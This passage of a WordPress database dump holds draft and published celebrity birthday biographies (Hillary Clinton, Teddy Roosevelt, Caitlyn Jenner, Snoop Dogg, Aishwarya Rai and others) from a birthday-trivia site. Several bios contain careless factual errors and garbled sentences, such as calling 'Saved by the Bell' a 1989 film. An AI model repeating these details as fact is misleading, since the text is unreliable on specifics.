children.\r\n<h3>Career Accomplishments</h3>\r\nHillary became the First Lady of The United States in 1993 and served until 2001. In that same year she became the <a href=\"http://www.usnews.com/news/articles/2008/12/03/10-things-you-didnt-know-about-hillary-clintons-senate-career\" target=\"_blank\">U.S. Senator</a>, and held her position until 2009. In 2007, Hillary announced she had plans to run for president. While the 2008 Democratic primaries were going on, she gave up her nomination when Barack Obama had most of the delegate vote. However, Hillary was elected to Secretary of State once Obama won the national election. She served until 2013. In 2015, Hillary once again announced she had plans to run for the position as President of the United States.\r\n<h3>Most Known For</h3>\r\nHillary Clinton is well known for her announcement to run for the <a href=\"https://en.wikipedia.org/wiki/Hillary_Clinton_presidential_campaign,_2016\" target=\"_blank\">U.S. Presidency</a>. She is also known as serving as the Secretary of State when Obama appointed her. Despite her extensive career, she is still very much known for being the wife of Bill Clinton.\r\n<h3></h3>\r\n<h3>Where Are They Now</h3>\r\nIn 2015, Hillary made her plans to run for President of the United States official. Her chairperson, John D. Podesta, announced in an e-mail on April 12<span style=\"font-size: 13.3333px; line-height: 20px;\"> </span>that Hillary was going to run for the presidential nomination for the 2016 elections. If she\'s successful, she will be the first woman in history to earn the nomination as a major party\'s presidential bid.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Hillary Clinton?</h2>\r\n<h2 style=\"text-align: center;\"></h2>','Hillary Clinton','','publish','open','open','','hillary-clinton-birthday','','','2015-11-30 22:23:08','2015-11-30 22:23:08','',0,'http://birthdaypedia.com/?p=497',0,'post','',0),(498,2,'2015-10-27 09:05:08','2015-10-27 09:05:08','Teddy Roosevelt is perhaps one of the more...interesting of the US presidents. He started out as a US governor, and is the 26 president of the United States. He has been remembered for his <a href=\"http://www.nps.gov/thro/learn/historyculture/theodore-roosevelt-and-conservation.htm\" target=\"_blank\">ecological preservation</a>, foreign policy, and corporate reforms.\r\n<h3>In the Beginning</h3>\r\nRoosevelt was born on October 27, 1858 in New York City. His mother was Martha Bulloch, and to Theodore Roosevelt Sr. His family was the owner of a plate glass import business which was very successful. Even when he was a young boy. Theodore Roosevelt was known among his family members “Teedie”. He was never fond of the nickname given to him as “Teddy”.\r\n\r\nRoosevelt grew up being home schooled due to his asthma and other illnesses. He nursed a passion for animal life during this time. When he became a teenager, his father encouraged Roosevelnt to keep up a physical routine of boxing and weightlifting.\r\n\r\nRoosevelt went on to attend Harvard College, but during his second year his father passed away. Roosevelt used his grief to work harder than ever. He graduated with magna cum laude in 1880. Soon after enrolling in <a href=\"https://www.law.columbia.edu/\" target=\"_blank\">Columbia Law School</a>. He married Alice Lee soon after. Roosevelt did not linger long in law school. He joined the <a href=\"https://en.wikipedia.org/wiki/New_York_State_Assembly\" target=\"_blank\">New York State Assembly</a>, and became a representative of New York City. He was the youngest person to ever serve in the position.\r\n<h3>Career Accomplishments</h3>\r\nTeddy Roosevelt has been able to accomplish a lot early in his career He became the youngest to serve as the representative from New York City. He became a civil service commissioner, served as the New York City police commissioner, and even as the Assistant U.S. Navy Secretary under President William McKinley. When the Spanish American War broke out, Teddy made the decision to leave his position.\r\n\r\nHe organized a volunteer cavalry that became known as the <a href=\"http://www.loc.gov/rr/hispanic/1898/roughriders.html\" target=\"_blank\">Rough Riders</a>. They charged San Juan Hill in the Battle of San Juan Heights in 1898. He came out as a war hero, and was even nominated for the Medal of Honor. In 1898, Teddy was elected as the governor of New York. When he was 42 years old, Teddy became the 26<sup>th</sup> president of the United States.\r\n<h3>Most Known For</h3>\r\nTeddy Roosevelt is best known as the 26<sup>th</sup> President of the United States. He was the youngest man to serve as the US president. Even winning his second term in 1904. Roosevelt soon became well known in office as an ecological conservationism and his anti-monopoly policies. Even winning the <a href=\"http://www.nobelprize.org/nobel_prizes/peace/laureates/1906/roosevelt-facts.html\" target=\"_blank\">Nobel Peace Prize</a> for taking part in ending the Russo-Japanese War.\r\n<h3>Current Personal Life</h3>\r\nWhen Teddy left office in 1909, his sense of adventure for life didn\'t end there. Teddy decided to go on an African safari. He spent over two years traveling, collecting specimens, and attending speaking engagements. He even became a special ambassador to England when it came to the funeral for <a href=\"https://en.wikipedia.org/wiki/Edward_VII\" target=\"_blank\">King Edward VII</a>.\r\n<h3>Where Are They Now</h3>\r\nTeddy Roosevelt passed away in his sleep on January 6, 1919 in his Long Island estate at Sagamore Hill. When he was still just a boy, the doctors found that Teddy had a weak heart. Despite their advice to have a desk job and not to overexert himself. Teddy went on to leave a very active life indeed.\r\n\r\nHe published over 25 books on a wide range of subjects including philosophy, history, geography, and even biology. He even published an autobiography and biography. Even including <em>The Winning of the West</em> which stretches ever four volumes. Teddy Roosevelt was buried in the <a href=\"http://trgravesite.org/cemetery.html\" target=\"_blank\">Youngs Memorial Cemetery</a> in New York.\r\n\r\n \r\n\r\n ','Teddy Roosevelt (1858 – 1919)','','draft','open','open','','teddy-roosevelt-1858-1919','','','2015-10-19 14:24:03','2015-10-19 14:24:03','',0,'http://birthdaypedia.com/?p=498',0,'post','',0),(499,2,'2015-10-28 07:24:28','2015-10-28 07:24:28','Caitlyn Jenner, once known as Bruce, is a track start. She won a gold medal at the <a href=\"https://en.wikipedia.org/wiki/1976_Summer_Olympics\" target=\"_blank\">1976 Summer Olympics</a>. When she was Bruce, she became a star on the TV show <em>Keeping Up with the Kardashians</em>. It wasn\'t until 2015 she revealed she is a transgender. After that, becoming a woman with the name Caitlyn.\r\n<h3>In the Beginning</h3>\r\nCaitlyn was born as William Bruce Jenner on October 28, 1949 in Mount Kisco, New York. Bruce faced challenges learning with dyslexia, but found he was talented when it came to sports. While attending high school, Jenner excelled in sports like track, water skiing, basketball, and football. Even managing to get a football scholarship from Graceland College in Iowa. During a game he suffered a knee injury. He was out of the game for a while before switching over to field and track.\r\n\r\nWeldon, his track couch, convinced Jenner to begin training for the <a href=\"http://trackandfield.about.com/od/decathlon/a/olymdecathbasic.htm\" target=\"_blank\">Olympic decathlon</a>. He had no idea he was going to come out as one of the most famous athletes in the 1970s.\r\n<h3>Career Accomplishments</h3>\r\nJenner rose to fame when he placed tenth in the Munich Games and third in the Olympic trials. During the 1976 Summer Olympics taking place in Montreal, Jenner broke a world record and won a gold medal. Even scoring 8,634 points during the decathlon. Later on, Jenner has appeared on the reality show<em> <a href=\"http://www.imdb.com/title/tt1086761/\" target=\"_blank\">Keeping Up with the Kardashians</a></em>. In an interview with Diane Sawyer, Jenner revealed he\'s transgender and infidelities as a female.\r\n<h3>Most Known For</h3>\r\nJenner well known for winning the gold medal in the 1976 Summer Olympics. Jenner broke a world record as well. More recently, she\'s been recognized for her identity change. In June of 2015, she announced on Twitter she\'s a woman, and from now on is going to be known as Caitlyn. She has also appeared on the hit reality TV series <em>Keeping Up with the Kardashians</em>.\r\n<h3>Current Personal Life</h3>\r\nCaitlyn being a transgender was speculated about in the tabloids in February of 2015. Jenner\'s appearance had been changing due to being one, and Jenner made the news official in an interview with Diane Sawyer. While the interview is being conducted, he talks about the emotional experience of discussing his transition from a man to a woman with his children. Along with his decision about hormone treatment and even his <a href=\"http://www.intouchweekly.com/posts/caitlyn-jenner-opens-up-about-her-sexuality-66407\" target=\"_blank\">sexual orientation</a>.\r\n\r\nEven Jenner\'s mother was interviewed on the issue. She was interviewed on T<em>he Associated Press</em>, and states she\'s proud of Jenner coming forward about his identity. There have been other family members who have been supportive of his decision, and have even made public statements in support of his decision.\r\n<h3>Where Are They Now</h3>\r\nRecently on July 15, 2015. Soon after she made the announcement she was <a href=\"http://www.vanityfair.com/hollywood/2015/06/caitlyn-jenner-bruce-cover-annie-leibovitz\" target=\"_blank\">transgender</a>, Jenner made her first appearance in public at the ESPY Awards in Los Angeles. She received the Arthur Ashe Award for courage. The award is awarded to people who are described as “transcending sports”. It\'s been awarded to other people like Nelson Mandela, Muhammad Ali, and even Billie Jean King.\r\n\r\nJenner was awarded with a standing ovation when she walked onto the stage in order to accept her award. She made an acceptance speech, and even spoke about how difficult it was making her transition:\r\n\r\n<em> “I trained hard, I competed hard, and for that people respected me. But this transition has been harder on me than anything I could imagine, and that’s the case for so many others, besides me. For that reason alone, trans people deserve something vital, they deserve your respect.”</em>\r\n\r\n \r\n\r\n \r\n\r\n ','Caitlyn Jenner (1949 – Present)','','draft','open','open','','','','','2017-06-20 16:08:48','2017-06-20 16:08:48','',0,'http://birthdaypedia.com/?p=499',0,'post','',0),(500,2,'2015-10-29 08:46:59','2015-10-29 08:46:59','Gabrielle is an actress, but she never had any intentions to become an actor. During her high school and college years, she was never participated in theater. She didn\'t even have any academic training in acting. Despite this, she has become one of the top young actresses in America.\r\n<h3>In the Beginning</h3>\r\nGabrielle Union was born on October 29, 1972 in <a href=\"https://en.wikipedia.org/wiki/Omaha,_Nebraska\" target=\"_blank\">Omaha, Nebraska</a>. Her mother, Theresa Glass, managed a phone company. Her father, Sylvester E. Union, worked as a business executive and as a military sergeant. She was eight years old, her family moved to Pleasanton, California. It was here she grew up and even went to high school. Union became an all-star point guard and was an athelete year round. Participating in track, soccer, and even basketball.\r\n\r\nAfter she graduated high school, she attended the University of Nebraska. She played on the university\'s soccer team, and transferred to <a href=\"http://www.cuesta.edu/\" target=\"_blank\">Cuesta College</a> later. She eventually ended up in <a href=\"http://www.ucla.edu/\" target=\"_blank\">UCLA</a>. It was during the time she was making her way to law school. Things began to happen while she was going through her senior year.\r\n\r\nShe began working for an L.A. Modeling agency in order to pick up some extra credits. Once she completed her internship, she was asked to be a client with the agency. Union thought it was a great way to pay her college loans, and modeled for her agent. During that time is when her agent found out that Union could act as well. Helping to get her acting career up and off the ground.\r\n<h3>Career Accomplishments</h3>\r\nThe first acting job Gabrielle Union ever had was on the film <em>Saved by the Bell</em> in 1989. Ever since, she has been able to take part in other small roles in films. She even guest starred on a couple of TV shows as well. She even landed a role playing the character Dr. Courtney Ellis, who was in the medical drama called City of Angels.\r\n\r\nShe has also wont the Black Reel Award for Best Supporting Actress for the film called <em><a href=\"http://www.imdb.com/title/tt0204946/\" target=\"_blank\">Bring It On</a></em>.\r\n<h3>Most Known For</h3>\r\nGabrielle is not very well known, but she is recognized for a few key things. Oprah Winfrey even praised her for being an <a href=\"http://www.borgenmagazine.com/gabrielle-union-voice-women/\" target=\"_blank\">activist for women</a>. Gabrielle has played roles in a few well known films. Such as being in not one, but two adaptions of The Taming of the Shrew. They are <em>10 Things I Hate About You</em> in 1999, and <em>Deliver Us from Eva</em> in 2003.\r\n<h3>Current Personal Life</h3>\r\nGabrielle Union insisted on a pre-nuptial agreement with her soon to be husband Dwyane Wade before they were <a href=\"http://www.latimes.com/entertainment/gossip/la-et-mg-gabrielle-union-dwyane-wade-married-wedding-20140902-story.html\" target=\"_blank\">married</a>. Leading up to her marriage to the man, the media was questioning whether Gabrielle was doing it to protect her \'brand\' and to just stick with a star with a lot of fame and money. Gabrielle opened up about her choice to marry the man, and made it clear she only did it because she loved him.\r\n<h3>Where Are They Now</h3>\r\nGabrielle is still involved in her acting career. In 2014, she held the No. 81 spot on the Maxim\'s “Hot 100” list. After her marriage to Dwyane Wade, she had also has three step-sons: Zaire Blessing Dwyane, Zion Malachi Airamis, and Xavier Zechariah Wade. Despite her career, Gabrielle has not been swept away by her fame.\r\n\r\nGabrielle Union is very quiet as far as celebrities go. She\'s not always in the tabloids, there\'s not a lot of drama, but despite all of that. She enjoys her life as an actress. She\'s made use of it, and has taken advantage of her position.\r\n\r\n \r\n\r\n ','Gabrielle Union (1972 – Present)','','draft','open','open','','','','','2015-10-19 14:58:52','2015-10-19 14:58:52','',0,'http://birthdaypedia.com/?p=500',0,'post','',0),(501,2,'2015-10-30 09:59:48','2015-10-30 09:59:48','Henry Winkler is an all around American actor. He\'s well known for the portrayal he did of Fonzie, and was a huge hit in the 1970s in the sitcom called <em><a href=\"http://tvtropes.org/pmwiki/pmwiki.php/Series/HappyDays\" target=\"_blank\">Happy Days</a></em>. Ever since his career has taken off, he\'s directed and produced several TV shows.\r\n<h3>In the Beginning</h3>\r\nHenry Winkler was born on October 30, 1945 in New York City. As he child he was described as being effervescent, and he had a passion for performing. When he was fourteen years old, Henry made the decision to become an actor. He had poor grades, but he had an audition that got him accepted into the <a href=\"http://drama.yale.edu/\" target=\"_blank\">Yale University Drama School</a>. While he attended Yale, Henry devoted a lot of time to performing. He often rehearsed on play a day, and would perform another one at night. After he graduated, he moved back home to New York where he began to focus on a career in Broadway.\r\n\r\nHenry didn\'t go for a career in television until he moved to Los Angeles in 1973. After only two weeks, he was able to win a part on <em>The Mary Tyler Moore Show</em>. Soon after, he got a bigger role in <em>The Bob Newhart Show</em>. Despite his success, Henry began to grow homesick after being in Los Angeles for a month. Before he moved back, he did attend one more audition. It was at this last audition he got the role of the biker in the new TV series <em>Happy Days</em>.\r\n<h3>Career Accomplishments</h3>\r\nHenry Winkler has done very well for himself ever since he made the decision to pursue his acting career. He\'s even a Member of the Board of Governors of the Academy Motion Picture Arts and Sciences in the Actors Branch. He even received an <a href=\"http://edition.cnn.com/2011/09/16/showbiz/celebrity-news-gossip/henry-winkler-obe/\" target=\"_blank\">Order of the British Empire</a> award from Queen Elizabeth II in honor of the work he has done for British children when it comes to learning challenges. He was accomplishing it through his My Way! Campaign.\r\n<h3>Most Known For</h3>\r\nHenry is still recognized for one of his first major TV roles. For instance, his role of Fonzie from the sitcom in the 1970s called <em>Happy Days</em>. He\'s also gone on to direct and produce TV shows and even acting in a couple of movies. He acted in <em>Scream</em> in 1996, <em>The Water Boy</em> in 1998, and even in the TV shows <em>Arrested Development</em> and <em>The Practice</em>.\r\n<h3>Current Personal Life</h3>\r\nWhen he\'s not involved in his acting career. He\'s been a devoted husband for over thirty years. He married Stacey Weitzman on May 5, 1978. He\'s a good father to his two children, and even an excellent stepfather to the son Weitzman from another message. He is very dedicated to children and it goes beyond even his own family.\r\n\r\nHenry has been the producer for A<em>ll the Kids are Doing It</em> and <em>Strong Kids, Safe Kids</em>. He\'s also been an advocate for a number of groups which benefit underprivileged children. He has also been involved in other charitable organizations like <a href=\"http://www.toysfortots.org/default.aspx\" target=\"_blank\">Toys for Tots</a> and the <a href=\"http://www.epilepsy.com/\" target=\"_blank\">Epilepsy Foundation</a>.\r\n<h3>Where Are They Now</h3>\r\nHenry Winkler is still involved in the film industry. When Happy Days was cancelled, he moved on to forming his own production company. He went on to produce quite a few TV series that saw success like <em>Ryan\'s Four</em> and <em>MacGyver</em>. He directed the films Memories of Me in 1988, and continued on with his acting career. Even performing on the horror hit <em>Scream</em> in 1996.\r\n\r\nHe has also been heavily involved in charitable organizations for children like Toys for Tots when he\'s not focusing on his career.\r\n\r\n \r\n\r\n ','Henry Winkler (1945 – Present)','','draft','open','open','','','','','2015-10-19 15:40:57','2015-10-19 15:40:57','',0,'http://birthdaypedia.com/?p=501',0,'post','',0),(502,2,'2015-10-31 09:41:30','2015-10-31 09:41:30','Christopher Columbus is the famous Italian explore who discovered the “New World” which came to be known later as America. His expedition was sponsored by the <a href=\"https://en.wikipedia.org/wiki/Ferdinand_II_of_Aragon\" target=\"_blank\">King of Spain, Ferdinand</a>, in 1492. Soon after Christopher Columbus set sail to make his discovery.\r\n<h3>In the Beginning</h3>\r\nChristopher Columbus was born in the 1451 in the <a href=\"https://en.wikipedia.org/wiki/Republic_of_Genoa\" target=\"_blank\">Republic of Genoa</a>. He was the son of the weaver, and did not go to sea until he was an adolescent. He took part in couple of trading voyages that went into the Mediterranean and Aegean seas. On one voyage he ended up on the island of Khios, which in modern day is Greece. It\'s the closest Columbus would ever come to Asia.\r\n\r\nHe took his first voyage in 1476 into the Atlantic Ocean. He nearly lost his life when the commercial fleet he was sailing was attacked by French privateers when he was off the cost of Portugal. The ship Columbus was on was burned, and he had to swim to the shore of Portugal. Columbus manages to get to Lisbon, Portugal. He settled down there and married a woman named Felipa Perestrello. They had one son in 1480 whom they named Diego. After he moved to Spain his wife died. Columbus did have a second son born out of Wedlock named Fernando in 1488 with a woman named Beatriz Enriquez.\r\n<h3>Career Accomplishments</h3>\r\nThe first voyage Christopher Columbus ever took in 1476 almost caused him to lose his life. Forcing him to swim to the shore of Portugal. He did take part in a couple of expeditions that went to Africa. In 1492, he left Spain to go to Santa Maria. He has also been given credit for being able to open up the way for the Americas to be colonized by the Europeans.\r\n<h3>Most Known For</h3>\r\nFirst and foremost, Christopher Columbus is credited with <a href=\"http://www.eyewitnesstohistory.com/columbus.htm\" target=\"_blank\">discovering the Americas</a>. This fact has been challenged in history, but Columbus is certainly at least partially responsible for opening the Americas to be colonized by the Europeans. The ironic part is he did not set out to discover the Americas in the first place. He was looking for a direct water route that went west from Europe to Asia. He never found the route, but did stumble upon what came to be known as the New World.\r\n<h3>Current Personal Life</h3>\r\nIn the remaining years of his life, Columbus did see some hardship. He was struggling to recover the titles he had lost. In May of 1505, he was able to gain some of the riches he once had back. However, he was never able to have his titles returned to him. He passed away on May 20, 1506 still under the assumption he had discovered a short route to Asia.\r\n<h3>Where Are They Now</h3>\r\nWhile Christopher Columbus is still remembered and even given credit for “discovering” the Americas when he never meant to. His legacy is a mixed one. He has been blamed for the destruction of the islands he explored and the native peoples who lived there. He also failed to find the route that he had set out to find in the first place. On the other hand, which even became known as the Columbian Exchange, helped to put in motion the transfer of cultures, people, diseases, plants, and even animals. The effects of which today has affected almost every society on the face of the planet.\r\n\r\nWhile Christopher Columbus may not be a hero, his actions have certainly left a large impact on the world today. He played a part in it\'s change and even growth for future generations.\r\n\r\n \r\n\r\n ','Christopher Columbus (1451 – 1506)','','draft','open','open','','','','','2015-10-19 16:25:31','2015-10-19 16:25:31','',0,'http://birthdaypedia.com/?p=502',0,'post','',0),(503,2,'2015-10-20 09:13:28','2015-10-20 09:13:28','Snoop Dogg is one of the most famous rappers in the world. Snoop Dogg\'s style of rapping as evolved with the help of fellow rapper <a href=\"https://en.wikipedia.org/wiki/Dr._Dre\" target=\"_blank\">Dr. Dre</a>, allowing the rapper to reach fame through his popular albums like <em><a href=\"http://pitchfork.com/reviews/albums/17920-snoop-lion-reincarnated/\" target=\"_blank\">Reincarnation</a></em>, <em>Doggystyle</em>, and <em>Tha Doggfather</em>.\r\n<h3>In the Beginning</h3>\r\nSnoop Dogg, whose real name is Calvin Broadus, was born on October 20, 1971 in <a href=\"https://en.wikipedia.org/wiki/Long_Beach,_California\" target=\"_blank\">Long Beach, California</a>. Broadus got the first part of his nickname, from his mother. She thought her son looked similar to the dog on the <em>Peanuts</em> cartoon.\r\n\r\nSnoop Dogg graduated high school in 1989, and afterwards was arrested multiple times. His arrests were mainly for drug possession, The rapper even had a few stints in prison. Faced with limited options to get out of his bad situation, Snoop Dogg began to make music.\r\n<h3>Career Accomplishments</h3>\r\nSnoop Dogg\'s first album, <em>Doggystyle,</em> was released in 1993. It reached the No. 1 spot on the Billboard\'s top charts. He has seen continued success in this career. Proof was in the pudding when Forbes ranked Snoop at No. 7 on “Hip Hop Cash Kings” lost. Snoop even had his own reality show at one point in December, 2007. The show was titled <em><a href=\"https://en.wikipedia.org/wiki/Snoop_Dogg%27s_Father_Hood\" target=\"_blank\">Snoop Dogg\'s Father Hood</a></em>.\r\n\r\nIn 2012, he announced he was actively working on an all-reggae album titled <em>Reincarnation</em>. In doing the project, Snoop Dogg also announced he would be dropping “Dogg” from his nickname and replacing it with “Lion” instead.\r\n<h3>Most Known For</h3>\r\nSnoop is known for the music he has produced, and for being at the center of the media\'s attention. One of his singles most people can recall is “Drop It Like It\'s Hot,\" which was released in 2005.\r\n\r\nDespite his fame, <a href=\"http://crime.about.com/od/famousdiduno/ig/mugshots_rap_hip_rb/snoop.htm\" target=\"_blank\">Snoop Dogg</a> has had several brushes with the law too. He was convicted of cocaine possession in 1990. Just a mere three years later, he plead guilty for gun possession too. Snoop became lucky when he was tried, but in 1996 she was acquitted of murder charges. Snoop was also sued in 2005 for apparently sexually assaulting a woman during the taping of the <em>Jimmy Kimmel Live</em> in 2003.\r\n\r\nSnoop was in the headlines again in 2006 with more legal trouble. At the London airport, he was taken into custody along with the people with him at the time. Later that same year, Snoop was arrested at Bob Hope Airport in Burbank, California. Officers found a gun and marijuana in the rapper\'s vehicle.\r\n<h3>Current Personal Life</h3>\r\nAccording to the<a href=\"http://www.latimes.com/entertainment/lat-cindy-celeb-la0008584204-20130305-photo.html\" target=\"_blank\"> Los Angeles Times</a>, in 2012, the rapper made the decision to change his name after he made a trip to Jamaica. During his trip, he met a priest who told him, “You are the light; you are the lion.”\r\n\r\nLater in the year, he released the debut single for <em>Reincarnation</em> which was called “La La La”.\r\n<h3>Where Are They Now</h3>\r\nSnoop Dogg is still in the music business. He has made appearances with several other rappers and projects over the years. While he refers to himself as Snoop Lion, the name change has yet to be accepted by most fans.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Snoop Dogg / Lion?</h2>\r\n[<a href=\"http://Kmeron\" target=\"_blank\">Image</a>]\r\n\r\n ','Snoop Dogg','','publish','open','open','','snoop-dogg-birthday','','','2015-11-09 17:53:09','2015-11-09 17:53:09','',0,'http://birthdaypedia.com/?p=503',0,'post','',0),(505,2,'2015-10-21 09:13:48','2015-10-21 09:13:48','Kim Kardashian is perhaps one of the few names in media today that draws <em>everyone\'s</em> attention. She\'s a star, model, actress, and entrepreneur. People mostly recognize her from the reality TV show <em><a href=\"https://en.wikipedia.org/wiki/Keeping_Up_with_the_Kardashians\" target=\"_blank\">Keeping Up with the Kardashians</a></em>.\r\n<h3>In the Beginning</h3>\r\nKim Kardashian was born on October 21, 1980 in <a href=\"https://www.beverlyhills.org/\" target=\"_blank\">Beverly Hills, California</a>. Her father is the late Robert Kardashian, and his first wife, Kris Houghton (now Jenner). Her siblings include Kourtney, Khloe, and Robert Jr. She also has two half-siblings from her mother\'s marriage to Bruce Jenner: Kendall and Kylie Jenner.\r\n\r\nAs a child, Kim went to Sunday church with her family regularly. Kim attended a Catholic high school, and at the time was working for her father\'s company.\r\n\r\nAfter her father\'s death, Kim and her siblings sold their father\'s company. She took a step int the business world, and created Kimsaprincess Productions, LLC. Releasing three workout videos starring herself, that turned out to be successes. But it was when her sex tape with rapper Ray J was leaked in 2007 that her name was on the tip of everyone\'s tongues.\r\n<h3>Career Accomplishments</h3>\r\nKim Kardashian\'s career is far from reaching its climax, but she has had a number of interesting accomplishments so far. The hit reality TV show she stars in, <em>Keeping Up with the Kardashians</em>, has a lot to do with her widely recognized fame. Since the start of the show in 2007, Kim, along with her sisters have created multiple businesses including stores, clothing lines, beauty lines and video game apps.\r\n<h3>Most Known For</h3>\r\nThe reality TV show, <em>Keeping Up with the Kardashians</em>, which follows the life of the Kardashians is perhaps one of the most widely recognized reality TV shows ever. Now, she is known for her style and celebrity marriage to Kanye West. However, in the past, it was her sex tape that everyone associated her with.\r\n<h3>Current Personal Life</h3>\r\nDuring her divorce to basketball star Kris Humphries, Kim starting a relationship with Kanye West. The couple revealed they were expecting their first child in 2012, and North West was born on June 15, 2013. The two got engaged on October 13, 2013, and eventually married in May 2014. Kim and Kayne announced they would be expecting a baby boy in December 2015.\r\n<h3>Where Are They Now</h3>\r\nKim is still starring in her reality TV series. She\'s also continuing to grow her businesses, including her phone app, Kim Kardashian Hollywood, which is one of the best selling apps of all time.\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Kim Kardashian?</h2>\r\n[<a href=\"http://Eva Rinaldi\" target=\"_blank\">Image</a>]','Kim Kardashian','','publish','open','open','','kim-kardashian-birthday','','','2015-11-09 18:50:19','2015-11-09 18:50:19','',0,'http://birthdaypedia.com/?p=505',0,'post','',0),(507,2,'2015-10-19 20:21:23','2015-10-19 20:21:23','','BirthdaypediaFavicon','','inherit','open','closed','','birthdaypediafavicon','','','2015-10-19 20:21:23','2015-10-19 20:21:23','',0,'http://birthdaypedia.com/wp-content/uploads/2015/10/BirthdaypediaFavicon.ico',0,'attachment','image/x-icon',0),(508,2,'2015-10-20 20:36:59','2015-10-20 20:36:59','','wellness-junky728 (1)','','inherit','open','closed','','wellness-junky728-1','','','2015-10-20 20:36:59','2015-10-20 20:36:59','',0,'http://birthdaypedia.com/wp-content/uploads/2015/10/wellness-junky728-1.png',0,'attachment','image/png',0),(511,2,'2015-10-21 16:17:32','2015-10-21 16:17:32','','paul simon birthday','','inherit','open','closed','','paul-simon-birthday','','','2015-10-21 16:17:38','2015-10-21 16:17:38','',366,'http://birthdaypedia.com/wp-content/uploads/2015/10/paul-simon-birthday.jpg',0,'attachment','image/jpeg',0),(513,2,'2015-10-21 16:59:31','2015-10-21 16:59:31','','Dwight Eisenhower birthday','','inherit','open','closed','','dwight-eisenhower-birthday','','','2015-10-21 17:00:34','2015-10-21 17:00:34','',367,'http://birthdaypedia.com/wp-content/uploads/2015/10/Dwight-Eisenhower-birthday.jpg',0,'attachment','image/jpeg',0),(516,2,'2015-10-30 13:56:38','2015-10-30 13:56:38','','sarah ferguson','','inherit','open','closed','','sarah-ferguson-2','','','2015-10-30 13:56:43','2015-10-30 13:56:43','',381,'http://birthdaypedia.com/wp-content/uploads/2015/10/sarah-ferguson.jpg',0,'attachment','image/jpeg',0),(518,2,'2015-10-30 15:20:03','2015-10-30 15:20:03','','bryce harper birthday','','inherit','open','closed','','bryce-harper-birthday','','','2015-10-30 15:20:10','2015-10-30 15:20:10','',391,'http://birthdaypedia.com/wp-content/uploads/2015/10/bryce-harper-birthday.jpg',0,'attachment','image/jpeg',0),(520,2,'2015-10-30 16:04:11','2015-10-30 16:04:11','','eminems birthday','','inherit','open','closed','','eminems-birthday','','','2015-10-30 16:04:44','2015-10-30 16:04:44','',411,'http://birthdaypedia.com/wp-content/uploads/2015/10/eminems-birthday.jpg',0,'attachment','image/jpeg',0),(522,2,'2015-10-30 16:19:34','2015-10-30 16:19:34','','freida pinto birthday','','inherit','open','closed','','freida-pinto-birthday','','','2015-10-30 16:19:43','2015-10-30 16:19:43','',420,'http://birthdaypedia.com/wp-content/uploads/2015/10/freida-pinto-birthday.jpg',0,'attachment','image/jpeg',0),(524,2,'2015-11-01 10:54:43','2015-11-01 10:54:43','Aishwarya Rai Bachan started out as a model at a young age. She was an architecture student before her career took off. In fact she only entered into the modeling job market due to having it as a part time job while she was a student. Ever since she\'s naturally risen to stardom.\r\n<h3>In the Beginning</h3>\r\nAishwarya was born on November 1, 1973 in <a href=\"http://www.mangaloreindia.com/\" target=\"_blank\">Mangalore, Karnataka</a>. Aishwarya was born into a traditional Indian family. Later in her life her family moved to Mumbai. There Aishwarya attended the Arya Vidya Mandir High School. She went through intermediate schooling at Jai Hin College for a year before enrolling in DG Ruparel College in Matunga. During her teen years Aishwarya was trained in classical music and dance for five years.\r\n\r\nAt first Aishwarya did wish to pursue a career in medicine. Despite her pursuits her efforts were unsuccessful. She made plans on becoming an architect instead and enrolled in Raheja College. At the time she was modeling as a part time job. This lead to her eventually leaving her education in order to pursue her future career in modeling.\r\n<h3>Career Accomplishments</h3>\r\nAishwarya didn\'t see the limelight until a Pepsi ad and a garden sari helped to boost her into the public eye. She came as the runner-up for the Crowned <a href=\"http://indpaedia.com/ind/index.php/Miss_India_winners:_1994\" target=\"_blank\">Miss India in 1994</a>. At the time she was a favorite for the miss world title, and even won it. This strong success only proved to be the beginning as she continued on her way into the movie industry.\r\n\r\nAishwarya surprised everyone by showing not only was she brilliant, but a talented actress to boot. Her performance for the movie <em><a href=\"http://www.bollywoodlife.com/movies/iruvar/\" target=\"_blank\">The Duo</a></em> in 1997 was critically acclaimed. She even won the best female debut award for the role she had in Aur Pyaar Ho Gaya in 1997.\r\n\r\nThat\'s not all she\'s done with her career though. Aishwarya became the first Indian actor to ever be a member on the jury for the Cannes Film Festival. She is one of the newest members for the elite L\'Oreal Dream Team. <em>TIME</em> Magazine even added her to their list of “100 Most Influential People in the World Today” in 2003. She\'s been listed on Rolling Stone Magazine\'s “Hot List” along with being noticed by other magazines as well.\r\n\r\nShe also became the first Indian female who has ever been immortalized in wax in the Madame Tussaud\'s wax museum in London.\r\n<h3>Most Known For</h3>\r\nAishwarya is recognized in India for one of her best known as a Veishnavi/Madhumita in the <em>Jeans</em> movie in 1998. Another film she\'s highly recognized for starring in is <em>I Have Found It</em> in 2000. She also won the Filmfare Award for best actress for her winning performance in <em>Straight from the Heart</em> in 1999. She even earned excellent reviews for another amazing performance she did in the film <em>Hamara Dil Aapke Paas Hai</em> in 2000.\r\n<h3>Current Personal Life</h3>\r\nAishwarya was linked romantically to a few famous names like Vivek Oberoi and Salman Khan for a time. Her beauty is well known, but she eventually did marry <a href=\"https://en.wikipedia.org/wiki/Abhishek_Bachchan\" target=\"_blank\">Abhishek Bachchan</a> on April 20, 2007.\r\n<h3>Where Are They Now</h3>\r\nAishwarya has continued to pursue her career. She has made an appearance on a few popular TV shows such as 60 Minutes, Late Show with David Letterman, and even Oprah. She took a role in the film <em>Mistress of Spices</em> in 2007. Along with with starring in other films like <em>The Last Legion</em> in 2007 and even playing the role of a villain in 2009 in the film <em>The Pink Panther 2</em>.\r\n\r\n \r\n\r\n ','Aishwarya Rai Bachchan (1973 – Present)','','draft','open','open','','','','','2015-11-03 00:12:10','2015-11-03 00:12:10','',0,'http://birthdaypedia.com/?p=524',0,'post','',0),(525,2,'2015-11-02 08:31:01','2015-11-02 08:31:01','Nelly is a famous American singer and rapper. Audiences recognized him for his hits like “Dilemma” and “Country Grammar”. He\'s even dipped his toes into an acting career too.\r\n<h2>In the Beginning</h2>\r\nNelly was born on November 2, 1974 in <a href=\"http://www.austintexas.org/visit/\" target=\"_blank\">Austin, Texas</a>. When he was still young his parents divorced. Nelly lived with his mother, and the small family moved to from St. Louis to University City, Missouri. Growing up Nelly had an interest in rap and baseball. He even formed his own musical group called the <a href=\"https://en.wikipedia.org/wiki/St._Lunatics\" target=\"_blank\">St. Lunatics</a> with a couple of his high school friends. His group became a local success when they produced the single “Gimme What You 